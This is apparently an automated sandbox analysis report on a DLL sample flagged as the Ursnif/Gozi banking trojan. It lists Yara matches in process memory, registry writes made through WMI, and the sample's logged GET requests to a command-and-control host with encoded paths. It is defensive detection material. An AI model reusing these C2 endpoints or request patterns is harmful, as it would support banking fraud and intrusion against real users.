          Source: global trafficHTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          E-Banking Fraud:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          PE file has a writeable .text sectionShow sources
          Source: 61b85f75e6a7c.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Writes or reads registry keys via WMIShow sources
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMIShow sources
          Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: 61b85f75e6a7c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
